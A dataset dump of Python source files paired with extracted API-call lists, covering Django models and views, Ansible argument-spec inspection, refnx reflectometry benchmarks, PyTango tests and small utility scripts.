code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
    # Initial migration for this app: creates the Shop model, owned by a user.
    # NOTE(review): the ForeignKey below has no on_delete argument, so this
    # targets Django < 2.0 (where on_delete defaulted to CASCADE) — confirm.

    dependencies = [
        # Shop.owner points at the (swappable) user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('town', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Shop',
            fields=[
                ('id', models.AutoField(auto_created=True, verbose_name='ID', serialize=False, primary_key=True)),
                ('name', models.CharField(max_length=255, verbose_name='Shop')),
                ('size', models.IntegerField()),
                # verbose_name is Japanese for "address".
                ('address', models.CharField(blank=True, max_length=255, verbose_name='住所', null=True)),
                # Timestamps default to creation time; not auto-updated on save.
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('modified', models.DateTimeField(default=django.utils.timezone.now)),
                # verbose_name is Japanese for "owner".
                ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL, verbose_name='所有者')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
| [
"django.db.models.IntegerField",
"django.db.models.ForeignKey",
"django.db.models.AutoField",
"django.db.models.DateTimeField",
"django.db.migrations.swappable_dependency",
"django.db.models.CharField"
] | [((239, 296), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (270, 296), False, 'from django.db import models, migrations\n'), ((459, 552), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'verbose_name': '"""ID"""', 'serialize': '(False)', 'primary_key': '(True)'}), "(auto_created=True, verbose_name='ID', serialize=False,\n primary_key=True)\n", (475, 552), False, 'from django.db import models, migrations\n'), ((576, 629), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'verbose_name': '"""Shop"""'}), "(max_length=255, verbose_name='Shop')\n", (592, 629), False, 'from django.db import models, migrations\n'), ((657, 678), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (676, 678), False, 'from django.db import models, migrations\n'), ((709, 783), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(255)', 'verbose_name': '"""住所"""', 'null': '(True)'}), "(blank=True, max_length=255, verbose_name='住所', null=True)\n", (725, 783), False, 'from django.db import models, migrations\n'), ((814, 869), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now'}), '(default=django.utils.timezone.now)\n', (834, 869), False, 'from django.db import models, migrations\n'), ((901, 956), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now'}), '(default=django.utils.timezone.now)\n', (921, 956), False, 'from django.db import models, migrations\n'), ((985, 1051), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'to': 'settings.AUTH_USER_MODEL', 'verbose_name': '"""所有者"""'}), "(to=settings.AUTH_USER_MODEL, verbose_name='所有者')\n", (1002, 1051), False, 'from django.db import models, migrations\n')] |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016 <NAME> <<EMAIL>>
# Copyright (C) 2016 Rackspace US, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import runpy
import json
import os
import subprocess
import sys
from contextlib import contextmanager
from ansible.executor.powershell.module_manifest import PSModuleDepFinder
from ansible.module_utils.basic import FILE_COMMON_ARGUMENTS
from ansible.module_utils.six import reraise
from ansible.module_utils._text import to_bytes, to_text
from .utils import CaptureStd, find_executable, get_module_name_from_filename
class AnsibleModuleCallError(RuntimeError):
    """Raised by the fake ``AnsibleModule.__init__`` to abort module execution
    once the constructor arguments have been captured."""
    pass
class AnsibleModuleImportError(ImportError):
    """Raised when importing/running a module for inspection fails."""
    pass
class AnsibleModuleNotInitialized(Exception):
    """Raised when a module ran to completion without ever constructing an
    AnsibleModule (so no argument spec could be captured)."""
    pass
class _FakeAnsibleModuleInit:
def __init__(self):
self.args = tuple()
self.kwargs = {}
self.called = False
def __call__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.called = True
raise AnsibleModuleCallError('AnsibleModuleCallError')
def _fake_load_params():
    # No-op replacement installed over ``basic._load_params`` by setup_env(),
    # so importing a module does not try to load real parameters.
    pass
@contextmanager
def setup_env(filename):
    """Temporarily neuter AnsibleModule so a module can be imported safely.

    Replaces ``AnsibleModule.__init__`` with a recording fake and
    ``_load_params`` with a no-op, restoring both on exit and purging any
    ``ansible.module_utils`` submodules imported inside the block.

    NOTE(review): *filename* is not used in the body — presumably kept for
    interface symmetry with the callers; confirm before removing.

    Yields:
        The _FakeAnsibleModuleInit instance that captures the init call.
    """
    # Used to clean up imports later
    pre_sys_modules = list(sys.modules.keys())

    fake = _FakeAnsibleModuleInit()
    module = __import__('ansible.module_utils.basic').module_utils.basic
    _original_init = module.AnsibleModule.__init__
    _original_load_params = module._load_params
    setattr(module.AnsibleModule, '__init__', fake)
    setattr(module, '_load_params', _fake_load_params)

    try:
        yield fake
    finally:
        # Always restore the real implementations, even if the caller raised.
        setattr(module.AnsibleModule, '__init__', _original_init)
        setattr(module, '_load_params', _original_load_params)

        # Clean up imports to prevent issues with mutable data being used in modules
        for k in list(sys.modules.keys()):
            # It's faster if we limit to items in ansible.module_utils
            # But if this causes problems later, we should remove it
            if k not in pre_sys_modules and k.startswith('ansible.module_utils.'):
                del sys.modules[k]
def get_ps_argument_spec(filename, collection):
    """Extract the argument spec of a PowerShell module via ps_argspec.ps1.

    Args:
        filename: path (relative to cwd) of the PowerShell module.
        collection: collection the module belongs to, for FQN resolution.

    Returns:
        Tuple of ``(argument_spec, (), kwargs)``, mirroring the shape
        returned by get_py_argument_spec.

    Raises:
        FileNotFoundError: if the ``pwsh`` executable is not on PATH.
        AnsibleModuleImportError: if the PowerShell inspection script fails.
    """
    fqc_name = get_module_name_from_filename(filename, collection)

    pwsh = find_executable('pwsh')
    if not pwsh:
        raise FileNotFoundError('Required program for PowerShell arg spec inspection "pwsh" not found.')

    module_path = os.path.join(os.getcwd(), filename)
    b_module_path = to_bytes(module_path, errors='surrogate_or_strict')
    with open(b_module_path, mode='rb') as module_fd:
        b_module_data = module_fd.read()

    ps_dep_finder = PSModuleDepFinder()
    ps_dep_finder.scan_module(b_module_data, fqn=fqc_name)

    # For ps_argspec.ps1 to compile Ansible.Basic it also needs the AddType module_util.
    ps_dep_finder._add_module((b"Ansible.ModuleUtils.AddType", ".psm1", None), wrapper=False)

    util_manifest = json.dumps({
        # BUG FIX: the error handler was misspelled 'surrogiate_or_strict',
        # which would raise LookupError the first time a path actually needed
        # the handler (non-decodable bytes).
        'module_path': to_text(module_path, errors='surrogate_or_strict'),
        'ansible_basic': ps_dep_finder.cs_utils_module["Ansible.Basic"]['path'],
        'ps_utils': dict([(name, info['path']) for name, info in ps_dep_finder.ps_modules.items()]),
    })

    script_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'ps_argspec.ps1')
    proc = subprocess.Popen([script_path, util_manifest], stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                            shell=False)
    stdout, stderr = proc.communicate()

    if proc.returncode != 0:
        raise AnsibleModuleImportError("STDOUT:\n%s\nSTDERR:\n%s" % (stdout.decode('utf-8'), stderr.decode('utf-8')))

    kwargs = json.loads(stdout)

    # the validate-modules code expects the options spec to be under the argument_spec key not options as set in PS
    kwargs['argument_spec'] = kwargs.pop('options', {})

    return kwargs['argument_spec'], (), kwargs
def get_py_argument_spec(filename, collection):
    """Run a Python module under the fake AnsibleModule to capture its arg spec.

    Relies on setup_env() having replaced ``AnsibleModule.__init__`` with a
    recorder that raises AnsibleModuleCallError as soon as the module builds
    its AnsibleModule.

    Returns:
        Tuple of ``(argument_spec, init args, init kwargs)``; an empty spec
        ``({}, (), {})`` when the captured call cannot be interpreted.

    Raises:
        AnsibleModuleImportError: if the module raises anything else while
            executing (including SystemExit).
        AnsibleModuleNotInitialized: if the module never built an AnsibleModule.
    """
    name = get_module_name_from_filename(filename, collection)

    with setup_env(filename) as fake:
        try:
            with CaptureStd():
                runpy.run_module(name, run_name='__main__', alter_sys=True)
        except AnsibleModuleCallError:
            # Expected: the fake __init__ fired, spec is captured.
            pass
        except BaseException as e:
            # we want to catch all exceptions here, including sys.exit
            reraise(AnsibleModuleImportError, AnsibleModuleImportError('%s' % e), sys.exc_info()[2])

    if not fake.called:
        raise AnsibleModuleNotInitialized()

    try:
        # for ping kwargs == {'argument_spec':{'data':{'type':'str','default':'pong'}}, 'supports_check_mode':True}
        if 'argument_spec' in fake.kwargs:
            argument_spec = fake.kwargs['argument_spec']
        else:
            argument_spec = fake.args[0]

        # If add_file_common_args is truish, add options from FILE_COMMON_ARGUMENTS when not present.
        # This is the only modification to argument_spec done by AnsibleModule itself, and which is
        # not caught by setup_env's AnsibleModule replacement
        if fake.kwargs.get('add_file_common_args'):
            for k, v in FILE_COMMON_ARGUMENTS.items():
                if k not in argument_spec:
                    argument_spec[k] = v

        return argument_spec, fake.args, fake.kwargs
    except (TypeError, IndexError):
        return {}, (), {}
def get_argument_spec(filename, collection):
    """Dispatch to the Python or PowerShell argument-spec extractor based on
    the module file's extension ('.py' means Python, anything else PS)."""
    extractor = (get_py_argument_spec if filename.endswith('.py')
                 else get_ps_argument_spec)
    return extractor(filename, collection)
| [
"json.loads",
"subprocess.Popen",
"sys.modules.keys",
"os.getcwd",
"os.path.realpath",
"runpy.run_module",
"ansible.module_utils.basic.FILE_COMMON_ARGUMENTS.items",
"ansible.module_utils._text.to_bytes",
"sys.exc_info",
"ansible.executor.powershell.module_manifest.PSModuleDepFinder",
"ansible.mo... | [((3157, 3208), 'ansible.module_utils._text.to_bytes', 'to_bytes', (['module_path'], {'errors': '"""surrogate_or_strict"""'}), "(module_path, errors='surrogate_or_strict')\n", (3165, 3208), False, 'from ansible.module_utils._text import to_bytes, to_text\n'), ((3325, 3344), 'ansible.executor.powershell.module_manifest.PSModuleDepFinder', 'PSModuleDepFinder', ([], {}), '()\n', (3342, 3344), False, 'from ansible.executor.powershell.module_manifest import PSModuleDepFinder\n'), ((3993, 4104), 'subprocess.Popen', 'subprocess.Popen', (['[script_path, util_manifest]'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'shell': '(False)'}), '([script_path, util_manifest], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, shell=False)\n', (4009, 4104), False, 'import subprocess\n'), ((4331, 4349), 'json.loads', 'json.loads', (['stdout'], {}), '(stdout)\n', (4341, 4349), False, 'import json\n'), ((1913, 1931), 'sys.modules.keys', 'sys.modules.keys', ([], {}), '()\n', (1929, 1931), False, 'import sys\n'), ((3114, 3125), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3123, 3125), False, 'import os\n'), ((2528, 2546), 'sys.modules.keys', 'sys.modules.keys', ([], {}), '()\n', (2544, 2546), False, 'import sys\n'), ((3645, 3696), 'ansible.module_utils._text.to_text', 'to_text', (['module_path'], {'errors': '"""surrogiate_or_strict"""'}), "(module_path, errors='surrogiate_or_strict')\n", (3652, 3696), False, 'from ansible.module_utils._text import to_bytes, to_text\n'), ((3935, 3961), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (3951, 3961), False, 'import os\n'), ((5804, 5833), 'ansible.module_utils.basic.FILE_COMMON_ARGUMENTS.items', 'FILE_COMMON_ARGUMENTS.items', ([], {}), '()\n', (5831, 5833), False, 'from ansible.module_utils.basic import FILE_COMMON_ARGUMENTS\n'), ((4783, 4842), 'runpy.run_module', 'runpy.run_module', (['name'], {'run_name': '"""__main__"""', 'alter_sys': '(True)'}), "(name, run_name='__main__', 
alter_sys=True)\n", (4799, 4842), False, 'import runpy\n'), ((5087, 5101), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (5099, 5101), False, 'import sys\n')] |
"""
print scripts
"""
from termcolor import colored
from pygitscrum.args import compute_args
import colorama
def print_resume_list(list_to_print, message):
    """
    Print a list summary: a green header, one yellow line per item,
    and a green total count. Empty lists print nothing.
    """
    if not list_to_print:
        return
    print("")
    print(my_colored(message + " : ", "green"))
    print(my_colored("\n".join(map(str, list_to_print)), "yellow"))
    print(my_colored("total : " + str(len(list_to_print)), "green"))
def print_resume_map(dict_to_print, message):
    """
    Print a dict summary: a green header, one yellow line per key with its
    element count, then a green grand total. Empty dicts print nothing.
    """
    if not dict_to_print:
        return
    print("")
    print(my_colored(message + " : ", "green"))
    for key, count in dict_to_print.items():
        line = key + " --> " + str(count) + " elements"
        print(my_colored(line, "yellow"))
    summary = (
        "total : " + str(len(dict_to_print))
        + " --> " + str(sum(dict_to_print.values())) + " elements "
    )
    print(my_colored(summary, "green"))
def print_debug(message):
    """
    Print a debug message, but only when the parsed CLI args enable debug.
    """
    if compute_args().debug:
        print("debug : " + message)
def print_y(message):
    """
    Print a message in yellow (unless colors are disabled by my_colored).
    """
    print(my_colored(message, "yellow"))
def print_g(message):
    """
    Print a message in green (unless colors are disabled by my_colored).
    """
    print(my_colored(message, "green"))
def print_r(message):
    """
    Print a message in red (unless colors are disabled by my_colored).
    """
    print(my_colored(message, "red"))
def my_colored(message, color):
    """Return *message* wrapped in termcolor codes for *color*, or unchanged
    when the --nocolor CLI flag is set."""
    return message if compute_args().nocolor else colored(message, color)
| [
"pygitscrum.args.compute_args",
"termcolor.colored"
] | [((1923, 1946), 'termcolor.colored', 'colored', (['message', 'color'], {}), '(message, color)\n', (1930, 1946), False, 'from termcolor import colored\n'), ((1458, 1472), 'pygitscrum.args.compute_args', 'compute_args', ([], {}), '()\n', (1470, 1472), False, 'from pygitscrum.args import compute_args\n'), ((1865, 1879), 'pygitscrum.args.compute_args', 'compute_args', ([], {}), '()\n', (1877, 1879), False, 'from pygitscrum.args import compute_args\n')] |
import torch
from estimation import compute_m
# Smoke test for estimation.compute_m on two small sparse 3x3 matrices.
# i holds COO coordinates: row indices first list, column indices second.
i = [[0, 1, 1, 2],
     [2, 0, 2, 1]]
v_z = [3, 4, 5, 2]  # nonzero values of z at those coordinates
v_c = [0, 1, 1, 0]  # nonzero values of c at those coordinates
z = torch.sparse_coo_tensor(i, v_z, (3, 3))
c = torch.sparse_coo_tensor(i, v_c, (3, 3))
max_K = 10  # NOTE(review): presumably an upper bound on components K — confirm in estimation.compute_m
m = compute_m(z, c, max_K)
print(m)
"torch.sparse_coo_tensor",
"estimation.compute_m"
] | [((128, 167), 'torch.sparse_coo_tensor', 'torch.sparse_coo_tensor', (['i', 'v_z', '(3, 3)'], {}), '(i, v_z, (3, 3))\n', (151, 167), False, 'import torch\n'), ((172, 211), 'torch.sparse_coo_tensor', 'torch.sparse_coo_tensor', (['i', 'v_c', '(3, 3)'], {}), '(i, v_c, (3, 3))\n', (195, 211), False, 'import torch\n'), ((229, 251), 'estimation.compute_m', 'compute_m', (['z', 'c', 'max_K'], {}), '(z, c, max_K)\n', (238, 251), False, 'from estimation import compute_m\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This file is part of the SMSGateway project
#
#
#
# Distributed under the terms of the MIT license.
# See LICENSE.txt for more info.
"""Contain the tests for the SMSGateway for PANIC."""
# Path
import sys
import os
path = os.path.join(os.path.dirname(__file__), os.pardir)
sys.path.insert(0, os.path.abspath(path))
# Imports
from time import sleep
from mock import MagicMock
from PyTango import DevFailed, DevState
from devicetest import DeviceTestCase, main
from SMSGateway import SMSGateway
# Note:
#
# Since the device uses an inner thread, it is necessary to
# wait during the tests in order the let the device update itself.
# Hence, the sleep calls have to be secured enough not to produce
# any inconsistent behavior. However, the unittests need to run fast.
# Here, we use a factor 3 between the read period and the sleep calls.
#
# Look at devicetest examples for more advanced testing
# Device test case
class SMSGatewayDeviceTestCase(DeviceTestCase):
    """Test case for packet generation."""
    # This class is POGO-generated scaffolding: the PROTECTED REGION markers
    # delimit the only areas meant for hand-written code, so the structure is
    # kept byte-for-byte.
    # PROTECTED REGION ID(SMSGateway.test_additionnal_import) ENABLED START #
    # PROTECTED REGION END #    //  SMSGateway.test_additionnal_import
    device = SMSGateway
    properties = {'IP': '', 'PIN': '9044',
                  }
    empty = None  # Should be []

    @classmethod
    def mocking(cls):
        """Mock external libraries."""
        # Example : Mock numpy
        #   cls.numpy = SMSGateway.numpy = MagicMock()
        # PROTECTED REGION ID(SMSGateway.test_mocking) ENABLED START #
        # PROTECTED REGION END #    //  SMSGateway.test_mocking

    def test_properties(self):
        # test the properties
        # PROTECTED REGION ID(SMSGateway.test_properties) ENABLED START #
        # PROTECTED REGION END #    //  SMSGateway.test_properties
        pass

    def test_State(self):
        """Test for State"""
        # PROTECTED REGION ID(SMSGateway.test_State) ENABLED START #
        self.device.State()
        # PROTECTED REGION END #    //  SMSGateway.test_State

    def test_Status(self):
        """Test for Status"""
        # PROTECTED REGION ID(SMSGateway.test_Status) ENABLED START #
        self.device.Status()
        # PROTECTED REGION END #    //  SMSGateway.test_Status

    def test_Reset(self):
        """Test for Reset"""
        # PROTECTED REGION ID(SMSGateway.test_Reset) ENABLED START #
        self.device.Reset()
        # PROTECTED REGION END #    //  SMSGateway.test_Reset

    def test_Connect(self):
        """Test for Connect"""
        # PROTECTED REGION ID(SMSGateway.test_Connect) ENABLED START #
        self.device.Connect()
        # PROTECTED REGION END #    //  SMSGateway.test_Connect

    def test_SendSMS(self):
        """Test for SendSMS"""
        # PROTECTED REGION ID(SMSGateway.test_SendSMS) ENABLED START #
        self.device.SendSMS()
        # PROTECTED REGION END #    //  SMSGateway.test_SendSMS

    def test_SetPin(self):
        """Test for SetPin"""
        # PROTECTED REGION ID(SMSGateway.test_SetPin) ENABLED START #
        self.device.SetPin()
        # PROTECTED REGION END #    //  SMSGateway.test_SetPin

    def test_TextMessage(self):
        """Test for TextMessage"""
        # PROTECTED REGION ID(SMSGateway.test_TextMessage) ENABLED START #
        self.device.TextMessage
        # PROTECTED REGION END #    //  SMSGateway.test_TextMessage

    def test_Phone(self):
        """Test for Phone"""
        # PROTECTED REGION ID(SMSGateway.test_Phone) ENABLED START #
        self.device.Phone
        # PROTECTED REGION END #    //  SMSGateway.test_Phone
# Main execution
if __name__ == "__main__":
    # Run the devicetest suite for this device server.
    main()
| [
"os.path.abspath",
"os.path.dirname",
"devicetest.main"
] | [((286, 311), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (301, 311), False, 'import os\n'), ((343, 364), 'os.path.abspath', 'os.path.abspath', (['path'], {}), '(path)\n', (358, 364), False, 'import os\n'), ((3670, 3676), 'devicetest.main', 'main', ([], {}), '()\n', (3674, 3676), False, 'from devicetest import DeviceTestCase, main\n')] |
#!/home/allen/Documents/TamarawTechProjects/interedregistration/intered/bin/python3
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"django.core.management.execute_from_command_line"
] | [((151, 189), 'django.core.management.execute_from_command_line', 'management.execute_from_command_line', ([], {}), '()\n', (187, 189), False, 'from django.core import management\n')] |
import os.path
import numpy as np
import pickle
from .common import Benchmark
from refnx.analysis import CurveFitter, Objective, Parameter
import refnx.reflect
from refnx.reflect._creflect import abeles as c_abeles
from refnx.reflect._reflect import abeles
from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity
from refnx.dataset import ReflectDataset as RD
class Abeles(Benchmark):
    """Benchmarks for the reflectivity kernels (C-accelerated vs pure Python)."""

    def setup(self):
        # 50000 q points over a typical reflectometry momentum-transfer range.
        self.q = np.linspace(0.005, 0.5, 50000)
        # One row per slab; NOTE(review): columns are presumably
        # [thickness, SLD, iSLD, roughness] per the refnx slab convention — confirm.
        self.layers = np.array([[0, 2.07, 0, 3],
                                [50, 3.47, 0.0001, 4],
                                [200, -0.5, 1e-5, 5],
                                [50, 1, 0, 3],
                                [0, 6.36, 0, 3]])
        # asv timing parameters for this benchmark class.
        self.repeat = 20
        self.number = 10

    def time_cabeles(self):
        # C implementation of the Abeles matrix method.
        c_abeles(self.q, self.layers)

    def time_abeles(self):
        # Pure-Python implementation, for comparison.
        abeles(self.q, self.layers)

    def time_reflectivity_constant_dq_q(self):
        reflectivity(self.q, self.layers)

    def time_reflectivity_pointwise_dq(self):
        # Per-point resolution smearing (dq proportional to q).
        reflectivity(self.q, self.layers, dq=0.05 * self.q)
class Reflect(Benchmark):
    """Benchmarks for fitting/sampling/pickling a reflectometry model built
    from the well-characterised e361 dataset."""

    timeout = 120.
    # repeat = 2

    def setup(self):
        pth = os.path.dirname(os.path.abspath(refnx.reflect.__file__))
        e361 = RD(os.path.join(pth, 'test', 'e361r.txt'))

        sio2 = SLD(3.47, name='SiO2')
        si = SLD(2.07, name='Si')
        d2o = SLD(6.36, name='D2O')
        polymer = SLD(1, name='polymer')

        # e361 is an older dataset, but well characterised
        structure361 = si | sio2(10, 4) | polymer(200, 3) | d2o(0, 3)
        model361 = ReflectModel(structure361, bkg=2e-5)
        model361.scale.vary = True
        model361.bkg.vary = True
        model361.scale.range(0.1, 2)
        model361.bkg.range(0, 5e-5)
        model361.dq = 5.

        # d2o
        structure361[-1].sld.real.vary = True
        structure361[-1].sld.real.range(6, 6.36)

        # keep one varying parameter around for the pickling benchmark
        self.p = structure361[1].thick
        structure361[1].thick.vary = True
        structure361[1].thick.range(5, 20)

        structure361[2].thick.vary = True
        structure361[2].thick.range(100, 220)
        structure361[2].sld.real.vary = True
        structure361[2].sld.real.range(0.2, 1.5)

        self.structure361 = structure361
        self.model361 = model361
        # e361.x_err = None

        self.objective = Objective(self.model361, e361)
        self.fitter = CurveFitter(self.objective, nwalkers=200)
        self.fitter.initialise('jitter')

    def time_reflect_emcee(self):
        # test how fast the emcee sampler runs in serial mode
        self.fitter.sampler.run_mcmc(self.fitter._state, 30)

    def time_reflect_sampling_parallel(self):
        # discrepancies in different runs may be because of different numbers
        # of processors
        self.model361.threads = 1
        self.fitter.sample(30, pool=-1)

    def time_pickle_objective(self):
        # time taken to pickle an objective
        s = pickle.dumps(self.objective)
        pickle.loads(s)

    def time_pickle_model(self):
        # time taken to pickle a model
        s = pickle.dumps(self.model361)
        pickle.loads(s)

    def time_pickle_parameter(self):
        # time taken to pickle a parameter
        # BUG FIX: this method was previously also named ``time_pickle_model``,
        # so it silently shadowed the model-pickling benchmark above and that
        # benchmark never ran.
        s = pickle.dumps(self.p)
        pickle.loads(s)

    def time_structure_slabs(self):
        self.structure361.slabs()
| [
"refnx.reflect.ReflectModel",
"refnx.reflect._reflect.abeles",
"refnx.reflect.SLD",
"pickle.dumps",
"refnx.analysis.Objective",
"numpy.array",
"refnx.reflect.reflectivity",
"numpy.linspace",
"pickle.loads",
"refnx.analysis.CurveFitter",
"refnx.reflect._creflect.abeles"
] | [((446, 476), 'numpy.linspace', 'np.linspace', (['(0.005)', '(0.5)', '(50000)'], {}), '(0.005, 0.5, 50000)\n', (457, 476), True, 'import numpy as np\n'), ((499, 609), 'numpy.array', 'np.array', (['[[0, 2.07, 0, 3], [50, 3.47, 0.0001, 4], [200, -0.5, 1e-05, 5], [50, 1, 0, \n 3], [0, 6.36, 0, 3]]'], {}), '([[0, 2.07, 0, 3], [50, 3.47, 0.0001, 4], [200, -0.5, 1e-05, 5], [\n 50, 1, 0, 3], [0, 6.36, 0, 3]])\n', (507, 609), True, 'import numpy as np\n'), ((819, 848), 'refnx.reflect._creflect.abeles', 'c_abeles', (['self.q', 'self.layers'], {}), '(self.q, self.layers)\n', (827, 848), True, 'from refnx.reflect._creflect import abeles as c_abeles\n'), ((885, 912), 'refnx.reflect._reflect.abeles', 'abeles', (['self.q', 'self.layers'], {}), '(self.q, self.layers)\n', (891, 912), False, 'from refnx.reflect._reflect import abeles\n'), ((969, 1002), 'refnx.reflect.reflectivity', 'reflectivity', (['self.q', 'self.layers'], {}), '(self.q, self.layers)\n', (981, 1002), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1058, 1109), 'refnx.reflect.reflectivity', 'reflectivity', (['self.q', 'self.layers'], {'dq': '(0.05 * self.q)'}), '(self.q, self.layers, dq=0.05 * self.q)\n', (1070, 1109), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1341, 1363), 'refnx.reflect.SLD', 'SLD', (['(3.47)'], {'name': '"""SiO2"""'}), "(3.47, name='SiO2')\n", (1344, 1363), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1377, 1397), 'refnx.reflect.SLD', 'SLD', (['(2.07)'], {'name': '"""Si"""'}), "(2.07, name='Si')\n", (1380, 1397), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1412, 1433), 'refnx.reflect.SLD', 'SLD', (['(6.36)'], {'name': '"""D2O"""'}), "(6.36, name='D2O')\n", (1415, 1433), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1452, 1474), 'refnx.reflect.SLD', 'SLD', (['(1)'], 
{'name': '"""polymer"""'}), "(1, name='polymer')\n", (1455, 1474), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((1624, 1661), 'refnx.reflect.ReflectModel', 'ReflectModel', (['structure361'], {'bkg': '(2e-05)'}), '(structure361, bkg=2e-05)\n', (1636, 1661), False, 'from refnx.reflect import SLD, Slab, Structure, ReflectModel, reflectivity\n'), ((2375, 2405), 'refnx.analysis.Objective', 'Objective', (['self.model361', 'e361'], {}), '(self.model361, e361)\n', (2384, 2405), False, 'from refnx.analysis import CurveFitter, Objective, Parameter\n'), ((2463, 2504), 'refnx.analysis.CurveFitter', 'CurveFitter', (['self.objective'], {'nwalkers': '(200)'}), '(self.objective, nwalkers=200)\n', (2474, 2504), False, 'from refnx.analysis import CurveFitter, Objective, Parameter\n'), ((3021, 3049), 'pickle.dumps', 'pickle.dumps', (['self.objective'], {}), '(self.objective)\n', (3033, 3049), False, 'import pickle\n'), ((3058, 3073), 'pickle.loads', 'pickle.loads', (['s'], {}), '(s)\n', (3070, 3073), False, 'import pickle\n'), ((3159, 3186), 'pickle.dumps', 'pickle.dumps', (['self.model361'], {}), '(self.model361)\n', (3171, 3186), False, 'import pickle\n'), ((3195, 3210), 'pickle.loads', 'pickle.loads', (['s'], {}), '(s)\n', (3207, 3210), False, 'import pickle\n'), ((3300, 3320), 'pickle.dumps', 'pickle.dumps', (['self.p'], {}), '(self.p)\n', (3312, 3320), False, 'import pickle\n'), ((3329, 3344), 'pickle.loads', 'pickle.loads', (['s'], {}), '(s)\n', (3341, 3344), False, 'import pickle\n')] |
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from django.template import loader
from .models import Question
from django.http import Http404
def index(request):
    """Render the poll index page with the five most recent questions."""
    recent = Question.objects.order_by("-pub_date")[:5]
    return render(request, 'polls/index.html',
                  {"last_questions_list": recent})
def edit(request):
    # Placeholder edit view; the response text is Spanish for
    # "Hello world, this is the Polls edit".
    return HttpResponse("Hola mundo, esta es el edit de Polls.")
def delete(request):
    # Placeholder delete view; the response text is Spanish for
    # "Hello world, this is the Polls delete".
    return HttpResponse("Hola mundo, esta es el delete de Polls.")
#def detail(request, question_id):
# return HttpResponse("Estas viendo el detalle de %s." % question_id)
#def detail(request, question_id):
# try:
# question = Question.objects.get(pk = question_id)
# except Question.DoesNotExist:
# raise Http404("La pagina no existe")
# return render(request, 'polls/detail.html', {"question" : question})
def detail(request, question_id):
    """Render the detail page for one question; raise 404 if it is missing."""
    question = get_object_or_404(Question, pk=question_id)
    context = {'question': question}
    return render(request, 'polls/detail.html', context)
def results(request, question_id):
    """Placeholder results view; the text is Spanish for
    "You are looking for the results of %s."."""
    return HttpResponse("Estas buscando los resultados de %s." % question_id)
def vote(request, question_id):
    # Placeholder vote view; the text is Spanish for "You have voted for %s".
    return HttpResponse("Tu has votado por %s" % question_id)
| [
"django.shortcuts.render",
"django.http.HttpResponse",
"django.shortcuts.get_object_or_404"
] | [((684, 728), 'django.shortcuts.render', 'render', (['request', '"""polls/index.html"""', 'context'], {}), "(request, 'polls/index.html', context)\n", (690, 728), False, 'from django.shortcuts import render, get_object_or_404\n'), ((761, 814), 'django.http.HttpResponse', 'HttpResponse', (['"""Hola mundo, esta es el edit de Polls."""'], {}), "('Hola mundo, esta es el edit de Polls.')\n", (773, 814), False, 'from django.http import HttpResponse\n'), ((848, 903), 'django.http.HttpResponse', 'HttpResponse', (['"""Hola mundo, esta es el delete de Polls."""'], {}), "('Hola mundo, esta es el delete de Polls.')\n", (860, 903), False, 'from django.http import HttpResponse\n'), ((1325, 1368), 'django.shortcuts.get_object_or_404', 'get_object_or_404', (['Question'], {'pk': 'question_id'}), '(Question, pk=question_id)\n', (1342, 1368), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1382, 1442), 'django.shortcuts.render', 'render', (['request', '"""polls/detail.html"""', "{'question': question}"], {}), "(request, 'polls/detail.html', {'question': question})\n", (1388, 1442), False, 'from django.shortcuts import render, get_object_or_404\n'), ((1546, 1582), 'django.http.HttpResponse', 'HttpResponse', (['(response % question_id)'], {}), '(response % question_id)\n', (1558, 1582), False, 'from django.http import HttpResponse\n'), ((1627, 1677), 